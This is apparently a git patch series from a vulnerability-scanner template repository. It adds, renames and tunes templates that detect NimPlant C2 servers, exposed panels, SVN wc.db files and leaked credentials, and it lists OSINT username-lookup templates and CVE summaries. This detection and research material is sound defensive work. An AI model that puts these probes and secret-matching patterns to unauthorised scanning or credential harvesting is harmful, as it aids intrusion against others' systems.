-osint/hackerearth.yaml -osint/hackernoon.yaml -osint/hackerone.yaml -osint/hackerrank.yaml -osint/hackster.yaml -osint/hamaha.yaml -osint/hanime.yaml -osint/hcommonssocial-mastodon-instance.yaml -osint/heylink.yaml -osint/hiberworld.yaml -osint/hihello.yaml -osint/historianssocial-mastodon-instance.yaml -osint/homedesign3d.yaml -osint/hometechsocial-mastodon-instance.yaml -osint/hoobe.yaml -osint/hostuxsocial-mastodon-instance.yaml -osint/houzz.yaml -osint/hubpages.yaml -osint/hubski.yaml -osint/hugging-face.yaml -osint/iconfinder.yaml -osint/icq-chat.yaml -osint/ifttt.yaml -osint/ifunny.yaml -osint/igromania.yaml -osint/ilovegrowingmarijuana.yaml -osint/imagefap.yaml -osint/imageshack.yaml -osint/imgsrcru.yaml -osint/imgur.yaml -osint/inaturalist.yaml -osint/independent-academia.yaml -osint/inkbunny.yaml -osint/insanejournal.yaml -osint/instagram.yaml -osint/instructables.yaml -osint/internet-archive-account.yaml -osint/internet-archive-user-search.yaml -osint/interpals.yaml -osint/ismygirl.yaml -osint/issuu.yaml -osint/itchio.yaml -osint/japandict.yaml -osint/jbzd.yaml -osint/jejapl.yaml -osint/jeuxvideo.yaml -osint/joe-monster.yaml -osint/jsfiddle.yaml -osint/justforfans.yaml -osint/kaggle.yaml -osint/karabin.yaml -osint/keybase.yaml -osint/kickstarter.yaml -osint/kik.yaml -osint/kipin.yaml -osint/knowyourmeme.yaml -osint/ko-fi.yaml -osint/kongregate.yaml -osint/kotburger.yaml -osint/kwejkpl.yaml -osint/librarything.yaml -osint/libretoothgr-mastodon-instance.yaml -osint/lichess.yaml -osint/likeevideo.yaml -osint/line.yaml -osint/linktree.yaml -osint/linuxorgru.yaml -osint/litmindclub-mastodon-instance.yaml -osint/livejournal.yaml -osint/livemasterru.yaml -osint/lobsters.yaml -osint/lorsh-mastodon-instance.yaml -osint/love-ru.yaml -osint/lowcygierpl.yaml -osint/maga-chat.yaml -osint/magabook.yaml -osint/magix.yaml -osint/manyvids.yaml -osint/mapmytracks.yaml -osint/mapstodonspace-mastodon-instance.yaml -osint/maroc-nl.yaml -osint/marshmallow.yaml -osint/martech.yaml -osint/massage-anywhere.yaml -osint/mastoai.yaml -osint/mastodon-101010pl.yaml -osint/mastodon-api.yaml -osint/mastodon-chaossocial.yaml -osint/mastodon-climatejusticerocks.yaml -osint/mastodon-countersocial.yaml -osint/mastodon-defcon.yaml -osint/mastodon-eu-voice.yaml -osint/mastodon-mastodon.yaml -osint/mastodon-meowsocial.yaml -osint/mastodon-mstdnio.yaml -osint/mastodon-polsocial.yaml -osint/mastodon-rigczclub.yaml -osint/mastodon-social-tchncs.yaml -osint/mastodon-tflnetpl.yaml -osint/mastodon-tootcommunity.yaml -osint/mastodonbooksnet-mastodon-instance.yaml -osint/mastodonchasedemdev-mastodon-instance.yaml -osint/mastodononline.yaml -osint/mastonyc-mastodon-instance.yaml -osint/mastown-mastodon-instance.yaml -osint/mcname-minecraft.yaml -osint/mcuuid-minecraft.yaml -osint/mediakits.yaml -osint/medium.yaml -osint/medyczkapl.yaml -osint/meet-me.yaml -osint/megamodelspl.yaml -osint/memrise.yaml -osint/message-me.yaml -osint/metacritic.yaml -osint/microsoft-technet-community.yaml -osint/minds.yaml -osint/minecraft-list.yaml -osint/mintme.yaml -osint/mistrzowie.yaml -osint/mix.yaml -osint/mixi.yaml -osint/mixlr.yaml -osint/mmorpg.yaml -osint/mod-db.yaml -osint/moneysavingexpert.yaml -osint/motokiller.yaml -osint/moxfield.yaml -osint/muck-rack.yaml -osint/musiciansocial-mastodon-instance.yaml -osint/musictraveler.yaml -osint/my-instants.yaml -osint/myanimelist.yaml -osint/mybuildercom.yaml -osint/myfitnesspal-author.yaml -osint/myfitnesspal-community.yaml -osint/mylot.yaml -osint/mymfans.yaml -osint/myportfolio.yaml -osint/myspace.yaml -osint/myspreadshop.yaml -osint/naija-planet.yaml -osint/nairaland.yaml -osint/naturalnews.yaml -osint/naver.yaml -osint/netvibes.yaml -osint/newgrounds.yaml -osint/newmeet.yaml -osint/nihbuatjajan.yaml -osint/nitecrew-mastodon-instance.yaml -osint/nnru.yaml -osint/notabug.yaml -osint/note.yaml -osint/oglaszamy24hpl.yaml -osint/ogugg.yaml -osint/okidoki.yaml -osint/okru.yaml -osint/olx.yaml -osint/omlet.yaml -osint/opencollective.yaml -osint/opensource.yaml -osint/openstreetmap.yaml -osint/opgg.yaml -osint/orbys.yaml -osint/osu.yaml -osint/our-freedom-book.yaml -osint/owly.yaml -osint/palnet.yaml -osint/parler-archived-posts.yaml -osint/parler-archived-profile.yaml -osint/parler.yaml -osint/pastebin.yaml -osint/patch.yaml -osint/patientslikeme.yaml -osint/patreon.yaml -osint/patriots-win.yaml -osint/patronite.yaml -osint/paypal.yaml -osint/pcgamer.yaml -osint/pcpartpicker.yaml -osint/peing.yaml -osint/periscope.yaml -osint/pettingzooco-mastodon-instance.yaml -osint/pewex.yaml -osint/picsart.yaml -osint/piekielni.yaml -osint/pikabu.yaml -osint/pillowfort.yaml -osint/pinkbike.yaml -osint/pinterest.yaml -osint/pixelfedsocial.yaml -osint/playstation-network.yaml -osint/plurk.yaml -osint/pokec.yaml -osint/pokemonshowdown.yaml -osint/pokerstrategy.yaml -osint/polchatpl.yaml -osint/policja2009.yaml -osint/poll-everywhere.yaml -osint/polygon.yaml -osint/popl.yaml -osint/pornhub-porn-stars.yaml -osint/pornhub-users.yaml -osint/poshmark.yaml -osint/postcrossing.yaml -osint/poweredbygaysocial-mastodon-instance.yaml -osint/producthunt.yaml -osint/promodj.yaml -osint/pronounspage.yaml -osint/pronouny.yaml -osint/prose.yaml -osint/prvpl.yaml -osint/psstaudio.yaml -osint/public.yaml -osint/pypi.yaml -osint/queer.yaml -osint/quitterpl.yaml -osint/quora.yaml -osint/raddleme.yaml -osint/rantli.yaml -osint/reblogme.yaml -osint/redbubble.yaml -osint/reddit.yaml -osint/redgifs.yaml -osint/refsheet.yaml -osint/researchgate.yaml -osint/resumes-actorsaccess.yaml -osint/revolut.yaml -osint/riskru.yaml -osint/roblox.yaml -osint/rsi.yaml -osint/ru-123rf.yaml -osint/rumblechannel.yaml -osint/rumbleuser.yaml -osint/salon24.yaml -osint/saracartershow.yaml -osint/scoutwiki.yaml -osint/scratch.yaml -osint/secure-donation.yaml -osint/seneporno.yaml -osint/sentimente.yaml -osint/seoclerks.yaml -osint/setlistfm.yaml -osint/sexworker.yaml -osint/sfd.yaml -osint/shanii-writes.yaml -osint/shesfreaky.yaml -osint/shopify.yaml -osint/shutterstock.yaml -osint/skeb.yaml -osint/skyrock.yaml -osint/slackholes.yaml -osint/slant.yaml -osint/slides.yaml -osint/slideshare.yaml -osint/smashrun.yaml -osint/smelsy.yaml -osint/smugmug.yaml -osint/smule.yaml -osint/snapchat-stories.yaml -osint/snapchat.yaml -osint/snipfeed.yaml -osint/soccitizen4eu.yaml -osint/social-msdn.yaml -osint/socialbundde.yaml -osint/sofurry.yaml -osint/solikick.yaml -osint/soloby.yaml -osint/soloto.yaml -osint/soundcloud.yaml -osint/soup.yaml -osint/sourceforge.yaml -osint/speaker-deck.yaml -osint/speedrun.yaml -osint/spiceworks.yaml -osint/sporcle.yaml -osint/spotify.yaml -osint/steam.yaml -osint/steemit.yaml -osint/steller.yaml -osint/stonerssocial-mastodon-instance.yaml -osint/storycorps.yaml -osint/streamelements.yaml -osint/streamlabs.yaml -osint/stripchat.yaml -osint/subscribestar.yaml -osint/sukebeinyaasi.yaml -osint/suzuri.yaml -osint/szmerinfo.yaml -osint/tabletoptournament.yaml -osint/tagged.yaml -osint/tamtam.yaml -osint/tanukipl.yaml -osint/tapitag.yaml -osint/tappy.yaml -osint/taringa.yaml -osint/taskrabbit.yaml -osint/teamtreehouse.yaml -osint/teddygirls.yaml -osint/teespring.yaml -osint/teknik.yaml -osint/telegram.yaml -osint/tellonym.yaml -osint/tenor.yaml -osint/tf2-backpack-examiner.yaml -osint/thegatewaypundit.yaml -osint/theguardian.yaml -osint/themeforest.yaml -osint/thetattooforum.yaml -osint/tiktok.yaml -osint/tildezone-mastodon-instance.yaml -osint/tinder.yaml -osint/tootingch-mastodon-instance.yaml -osint/totalwar.yaml -osint/toyhouse.yaml -osint/trackmanialadder.yaml -osint/tradingview.yaml -osint/trakt.yaml -osint/trello.yaml -osint/tripadvisor.yaml -osint/truth-social.yaml -osint/tumblr.yaml -osint/tunefind.yaml -osint/twitcasting.yaml -osint/twitch.yaml -osint/twitter-archived-profile.yaml -osint/twitter-archived-tweets.yaml -osint/twitter.yaml -osint/twpro.yaml -osint/ubisoft.yaml -osint/udemy.yaml -osint/uefconnect.yaml -osint/uid.yaml -osint/uiuxdevsocial-mastodon-instance.yaml -osint/ultras-diary.yaml -osint/ulubpl.yaml -osint/unsplash.yaml -osint/untappd.yaml -osint/usa-life.yaml -osint/utipio.yaml -osint/uwuai.yaml -osint/uwumarket.yaml -osint/venmo.yaml -osint/vero.yaml -osint/vibilagare.yaml -osint/viddler.yaml -osint/vimeo.yaml -osint/vine.yaml -osint/vip-blog.yaml -osint/virustotal.yaml -osint/visnesscard.yaml -osint/vivino.yaml -osint/vk.yaml -osint/vklworld-mastodon-instance.yaml -osint/vmstio-mastodon-instance.yaml -osint/voice123.yaml -osint/voicescom.yaml -osint/vsco.yaml -osint/wanelo.yaml -osint/warriorforum.yaml -osint/watchmemorecom.yaml -osint/watchmyfeed.yaml -osint/wattpad.yaml -osint/weasyl.yaml -osint/weebly.yaml -osint/wego.yaml -osint/weheartit.yaml -osint/weibo.yaml -osint/wetransfer.yaml -osint/wikidot.yaml -osint/wikipedia.yaml -osint/wimkin-publicprofile.yaml -osint/wireclub.yaml -osint/wishlistr.yaml -osint/wolni-slowianie.yaml -osint/wordnik.yaml -osint/wordpress-support.yaml -osint/wordpress.yaml -osint/wowhead.yaml -osint/wykop.yaml -osint/xanga.yaml -osint/xbox-gamertag.yaml -osint/xhamster.yaml -osint/xing.yaml -osint/xvideos-models.yaml -osint/xvideos-profiles.yaml -osint/yahoo-japan-auction.yaml -osint/yapishu.yaml -osint/yazawaj.yaml -osint/yelp.yaml -osint/youpic.yaml -osint/youtube.yaml -osint/zatrybipl.yaml -osint/zbiornik.yaml -osint/zhihu.yaml -osint/zillow.yaml -osint/zmarsacom.yaml -osint/zomato.yaml -osint/zoomitir.yaml -technologies/mojoportal-detect.yaml -vulnerabilities/other/nextjs-redirect.yaml -vulnerabilities/wordpress/seatreg-redirect.yaml +technologies/wordpress/plugins/wpvivid-backuprestore.yaml From 80cd6921974dd57855dffdb5a8a8893d93f16131 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 2 Mar 2023 12:25:14 +0530 Subject: [PATCH 34/84] minor -update --- exposed-panels/c2/nimplant-c2-server.yaml | 27 +++++++++++++++++++++++ exposed-panels/c2/nimplant-c2.yaml | 26 ---------------------- 2 files changed, 27 insertions(+), 26 deletions(-) create mode 100644 exposed-panels/c2/nimplant-c2-server.yaml delete mode 100644 exposed-panels/c2/nimplant-c2.yaml diff --git a/exposed-panels/c2/nimplant-c2-server.yaml b/exposed-panels/c2/nimplant-c2-server.yaml new file mode 100644 index 0000000000..5f63a7868e --- /dev/null +++ b/exposed-panels/c2/nimplant-c2-server.yaml @@ -0,0 +1,27 @@ +id: nimplant-c2-server + +info: + name: NimPlant C2 Server - Detect + author: ja1sh + severity: info + description: | + NimPlant is an open source light first-stage C2 implant written in Nim and Python. It is designed to be used as a starting point for those who want to develop their own custom C2 implants. + NimPlant is fully customizable and lightweight, making it easy to integrate into existing C2 frameworks. + reference: + - https://github.com/chvancooten/NimPlant + metadata: + verified: "true" + shodan-query: "nimplant C2 server" + tags: nimplant,c2,detect + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "NimPlant C2 Server" diff --git a/exposed-panels/c2/nimplant-c2.yaml b/exposed-panels/c2/nimplant-c2.yaml deleted file mode 100644 index 47c0d77dc5..0000000000 --- a/exposed-panels/c2/nimplant-c2.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: nimplant-c2-server - -info: - name: NimPlant C2 Server Detection - author: ja1sh - severity: info - reference: - - https://github.com/chvancooten/NimPlant - description: | - An attacker can detect the public instance of a NimPlant C2 Framework - metadata: - verified: "true" - shodan-query: "nimplant C2 server" - tags: nimplant,c2 framework,detection,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "NimPlant C2" From 9abf6f8ab47b4f140cf44231f18e3b187e01c054 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Mar 2023 12:44:50 +0530 Subject: [PATCH 35/84] fix-formatting --- exposed-panels/axway-securetransport.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/exposed-panels/axway-securetransport.yaml b/exposed-panels/axway-securetransport.yaml index b74fe7a937..05c90a9a88 100644 --- a/exposed-panels/axway-securetransport.yaml +++ b/exposed-panels/axway-securetransport.yaml @@ -4,14 +4,13 @@ info: name: AXWAY Secure Transport Panel - Detect author: righettod severity: info - description: AXWAY Secure Transport panel was detected. + description: | + AXWAY Secure Transport panel was detected. reference: - https://www.axway.com/en/products/managed-file-transfer/securetransport metadata: verified: "true" - shodan-query: - - http.title:"SecureTransport" - - http.favicon.hash:1330269434 + shodan-query: http.title:"SecureTransport" || http.favicon.hash:1330269434 tags: panel,login,axway,securetransport requests: From 33aa1e5b8d62903b129654c11d4efe5834fb1c12 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 2 Mar 2023 12:49:07 +0530 Subject: [PATCH 36/84] Delete kubeview-dashboard-detect.yaml --- exposed-panels/kubeview-dashboard-detect.yaml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 exposed-panels/kubeview-dashboard-detect.yaml diff --git a/exposed-panels/kubeview-dashboard-detect.yaml b/exposed-panels/kubeview-dashboard-detect.yaml deleted file mode 100644 index 292e0888e4..0000000000 --- a/exposed-panels/kubeview-dashboard-detect.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: kubeview-dashboard-detection - -info: - name: KubeView Dashboard Exposure - author: ja1sh - severity: info - description: An attacker can detect the public instance of a KubeView dashboard - tags: dashboard,k8s,dashboard,exposure - metadata: - shodan-query: "http.favicon.hash:-379154636" - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - KubeView - From ac542860684a38fbdb353a8e0fa8eb09a70f8de5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Mar 2023 15:26:34 +0530 Subject: [PATCH 37/84] fix formatting --- exposed-panels/c2/{nimplant-c2-server.yaml => nimplant-c2.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/c2/{nimplant-c2-server.yaml => nimplant-c2.yaml} (96%) diff --git a/exposed-panels/c2/nimplant-c2-server.yaml b/exposed-panels/c2/nimplant-c2.yaml similarity index 96% rename from exposed-panels/c2/nimplant-c2-server.yaml rename to exposed-panels/c2/nimplant-c2.yaml index 5f63a7868e..2d642e2311 100644 --- a/exposed-panels/c2/nimplant-c2-server.yaml +++ b/exposed-panels/c2/nimplant-c2.yaml @@ -1,4 +1,4 @@ -id: nimplant-c2-server +id: nimplant-c2 info: name: NimPlant C2 Server - Detect From 098e50da12f25e00acf5894a44fa6e1a0e41dbdf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Mar 2023 15:35:55 +0530 Subject: [PATCH 38/84] fixed-template --- exposures/files/svn-wc-db.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposures/files/svn-wc-db.yaml b/exposures/files/svn-wc-db.yaml index a22163ec8e..bc6c3b1bce 100644 --- a/exposures/files/svn-wc-db.yaml +++ b/exposures/files/svn-wc-db.yaml @@ -2,8 +2,8 @@ id: svn-wc-db info: name: SVN wc.db File Exposure - author: Hardik-Solanki, R12W4N - severity: High + author: Hardik-Solanki,R12W4N + severity: medium reference: - https://github.com/maurosoria/dirsearch/blob/master/db/dicc.txt - https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/svn_wcdb_scanner.rb @@ -17,8 +17,10 @@ requests: - method: HEAD path: - "{{BaseURL}}/.svn/wc.db" - - "{{RootURL}}/.svn/wc.db" + - "{{BaseURL}}/wc.db" + stop-at-first-match: true + max-size: 10000 matchers: - type: status status: From 92794af0f9584c1d1d1da218f877cb41bcd433a3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 2 Mar 2023 15:41:39 +0530 Subject: [PATCH 39/84] updated info,matcher,path --- {exposed-panels/c2 => technologies}/nimplant-c2.yaml | 6 ++---- 1 file changed, 2 insertions(+), 4 deletions(-) rename {exposed-panels/c2 => technologies}/nimplant-c2.yaml (78%) diff --git a/exposed-panels/c2/nimplant-c2.yaml b/technologies/nimplant-c2.yaml similarity index 78% rename from exposed-panels/c2/nimplant-c2.yaml rename to technologies/nimplant-c2.yaml index 2d642e2311..58a8575e37 100644 --- a/exposed-panels/c2/nimplant-c2.yaml +++ b/technologies/nimplant-c2.yaml @@ -5,21 +5,19 @@ info: author: ja1sh severity: info description: | - NimPlant is an open source light first-stage C2 implant written in Nim and Python. It is designed to be used as a starting point for those who want to develop their own custom C2 implants. - NimPlant is fully customizable and lightweight, making it easy to integrate into existing C2 frameworks. + NimPlant is an open source light first-stage C2 implant written in Nim and Python. It is designed to be used as a starting point for those who want to develop their own custom C2 implants. NimPlant is fully customizable and lightweight, making it easy to integrate into existing C2 frameworks. reference: - https://github.com/chvancooten/NimPlant metadata: verified: "true" shodan-query: "nimplant C2 server" - tags: nimplant,c2,detect + tags: tech,nimplant,c2 requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word part: header From b476878ffddc59d93fda3cefa05caaba7079735b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Mar 2023 15:45:36 +0530 Subject: [PATCH 40/84] deletion --- cves/2021/CVE-2021-42097.yaml | 30 ------------------------------ 1 file changed, 30 deletions(-) delete mode 100644 cves/2021/CVE-2021-42097.yaml diff --git a/cves/2021/CVE-2021-42097.yaml b/cves/2021/CVE-2021-42097.yaml deleted file mode 100644 index 6990f0262c..0000000000 --- a/cves/2021/CVE-2021-42097.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: cve-2021-42097 -info: - name: GNU Mailman Remote Privilege Escalation - author: Matt Galligan - severity: high - description: GNU Mailman < 2.1.35 Privesc / CSRF Token Bypass - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-42097 - - https://access.redhat.com/errata/RHSA-2021:4913 - - https://mail.python.org/archives/list/mailman-announce@python.org/thread/IKCO6JU755AP5G5TKMBJL6IEZQTTNPDQ/ -requests: - - method: GET - path: - - "{{BaseURL}}/mailman/listinfo" - - "{{BaseURL}}/listinfo" - matchers-condition: and - matchers: - - type: word - words: - - Delivered by Mailman - - type: dsl - dsl: - - to_string(version) < "2.1.35" - extractors: - - type: regex - name: version - internal: true - group: 1 - regex: - - (?m)version ([0-9.]+) From 7fa6631050d27b7d707ec21f23335002abca33e1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 10:16:02 +0000 Subject: [PATCH 41/84] Auto Generated New Template Addition List [Thu Mar 2 10:16:02 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 247be82666..57d6a84358 100644 --- a/.new-additions +++ b/.new-additions @@ -1 +1,2 @@ +technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From d7f8fc622f7672888d8395822fb98c1eef60b75a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 2 Mar 2023 15:54:37 +0530 Subject: [PATCH 43/84] fixed --- .../{exposed-gnu-mailman.yaml => gnu-mailman.yaml} | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) rename exposed-panels/{exposed-gnu-mailman.yaml => gnu-mailman.yaml} (69%) diff --git a/exposed-panels/exposed-gnu-mailman.yaml b/exposed-panels/gnu-mailman.yaml similarity index 69% rename from exposed-panels/exposed-gnu-mailman.yaml rename to exposed-panels/gnu-mailman.yaml index a2b414460e..48045aaafa 100644 --- a/exposed-panels/exposed-gnu-mailman.yaml +++ b/exposed-panels/gnu-mailman.yaml @@ -1,13 +1,13 @@ -id: exposed-gnu-mailman +id: gnu-mailman info: - name: Exposed GNU Mailman -Detect + name: Exposed GNU Mailman - Detect author: Matt Galligan severity: info description: | - listing of all the public mailing lists + Lists of all the public mailing. metadata: - verified: true + verified: "true" shodan-query: title:"Mailing Lists" tags: exposure,mailman @@ -17,14 +17,16 @@ requests: - "{{BaseURL}}/mailman/listinfo" - "{{BaseURL}}/listinfo" + stop-at-first-match: true matchers-condition: and matchers: - type: word words: - - "Delivered by Mailman" + - "Mailing Lists" - "Description" - "list" condition: and + case-insensitive: true - type: status status: From 7d1b88c41fcfd3d482faecf133fcc599fcd1f965 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 2 Mar 2023 15:57:39 +0530 Subject: [PATCH 44/84] updated severity --- exposed-panels/kubeview-dashboard.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/kubeview-dashboard.yaml b/exposed-panels/kubeview-dashboard.yaml index b0cc6808b5..8c03a579e8 100644 --- a/exposed-panels/kubeview-dashboard.yaml +++ b/exposed-panels/kubeview-dashboard.yaml @@ -3,13 +3,13 @@ id: kubeview-dashboard info: name: KubeView Dashboard Exposure author: ja1sh - severity: info + severity: low description: | An attacker can detect the public instance of a KubeView dashboard metadata: verified: "true" - shodan-query: "http.favicon.hash:-379154636" - tags: k8s,kubernetes,kubeview,dashboard,exposure + shodan-query: http.favicon.hash:-379154636 + tags: exposure,k8s,kubernetes,kubeview,dashboard requests: - method: GET From 774c2be888e7b2eb19a35fd8191473b45902e96a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 10:31:17 +0000 Subject: [PATCH 45/84] Auto Generated New Template Addition List [Thu Mar 2 10:31:17 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 57d6a84358..d7fdffe9e4 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ +exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From 73ecf1fc4b48b69ca8c4a15680d5182a39d5b36c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 10:41:17 +0000 Subject: [PATCH 46/84] Auto Generated New Template Addition List [Thu Mar 2 10:41:17 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index d7fdffe9e4..60b42f8422 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ +cves/2022/CVE-2022-48165.yaml exposed-panels/kubeview-dashboard.yaml technologies/nimplant-c2.yaml technologies/wordpress/plugins/wpvivid-backuprestore.yaml From 9d28830b476079a48e2e4e9c6581649bc5b732a6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 2 Mar 2023 10:41:35 +0000 Subject: [PATCH 47/84] Auto Generated cves.json [Thu Mar 2 10:41:35 UTC 2023] :robot: --- cves.json | 1 + 1 file changed, 1 insertion(+) diff --git a/cves.json b/cves.json index f31d6f0ad7..89385b2a46 100644 --- a/cves.json +++ b/cves.json @@ -1589,6 +1589,7 @@ {"ID":"CVE-2022-47945","Info":{"Name":"Thinkphp Lang - Local File Inclusion","Severity":"critical","Description":"ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47945.yaml"} {"ID":"CVE-2022-47966","Info":{"Name":"ManageEngine - Remote Command Execution","Severity":"critical","Description":"Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47966.yaml"} {"ID":"CVE-2022-47986","Info":{"Name":"Pre-Auth RCE in Aspera Faspex","Severity":"critical","Description":"IBM Aspera Faspex could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2022/CVE-2022-47986.yaml"} +{"ID":"CVE-2022-48165","Info":{"Name":"Wavlink - Configuration Exposure","Severity":"high","Description":"An access control issue in the component /cgi-bin/ExportLogs.sh of Wavlink WL-WN530H4 M30H4.V5030.210121 allows unauthenticated attackers to download configuration data and log files and obtain admin credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"cves/2022/CVE-2022-48165.yaml"} {"ID":"CVE-2023-0669","Info":{"Name":"GoAnywhere MFT - Remote Code Execution (ZeroDay)","Severity":"high","Description":"Fortra (formerly, HelpSystems) GoAnywhere MFT suffers from a pre-authentication command injection vulnerability in the License Response Servlet due to deserializing an arbitrary attacker-controlled object.\n","Classification":{"CVSSScore":"7.2"}},"file_path":"cves/2023/CVE-2023-0669.yaml"} {"ID":"CVE-2023-23488","Info":{"Name":"Paid Memberships Pro \u003c 2.9.8 - Unauthenticated Blind SQLi","Severity":"critical","Description":"The Paid Memberships Pro WordPress Plugin, version \u003c 2.9.8, is affected by an unauthenticated SQL injection vulnerability in the 'code' parameter of the '/pmpro/v1/order' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23488.yaml"} {"ID":"CVE-2023-23489","Info":{"Name":"Easy Digital Downloads 3.1.0.2 \u0026 3.1.0.3 - Unauthenticated SQLi","Severity":"critical","Description":"The Easy Digital Downloads WordPress Plugin, versions 3.1.0.2 \u0026 3.1.0.3, is affected by an unauthenticated SQL injection vulnerability in the 's' parameter of its 'edd_download_search' action.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2023/CVE-2023-23489.yaml"} From 86bd415f2859792c5f8ea2ecc5ea6616eb1e269d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 2 Mar 2023 16:16:05 +0530 Subject: [PATCH 48/84] updated regex --- exposures/tokens/generic/credentials-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index 487b518396..e33cee2dea 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -707,6 +707,6 @@ requests: - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*(?!null)[\"']?[\\w-]+[\"']?" + - "(?i)["']?access[_-]?token["']?[^\\S\r\n]*[=:][^\S\r\n]*[^(null)][\"']?[\w-]+["']?" - "(?i)[\"']?access[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?access[_-]?key[_-]?secret[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" From 918fbdaa63769af9994b6bcc15c3ba79d6368a34 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Thu, 2 Mar 2023 16:22:45 +0530 Subject: [PATCH 49/84] fixed lint --- exposures/tokens/generic/credentials-disclosure.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposures/tokens/generic/credentials-disclosure.yaml b/exposures/tokens/generic/credentials-disclosure.yaml index e33cee2dea..db2456a4b0 100644 --- a/exposures/tokens/generic/credentials-disclosure.yaml +++ b/exposures/tokens/generic/credentials-disclosure.yaml @@ -707,6 +707,6 @@ requests: - "(?i)[\"']?adzerk[_-]?api[_-]?key[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?admin[_-]?email[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - "(?i)[\"']?account[_-]?sid[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[\"']?[\\w-]+[\"']?" - - "(?i)["']?access[_-]?token["']?[^\\S\r\n]*[=:][^\S\r\n]*[^(null)][\"']?[\w-]+["']?" + - "(?i)[\"']?access[_-]?token[\"']?[^\\S\r\n]*[=:][^\\S\r\n]*[^(null)][\"']?[\\w-]+[\"']?" - 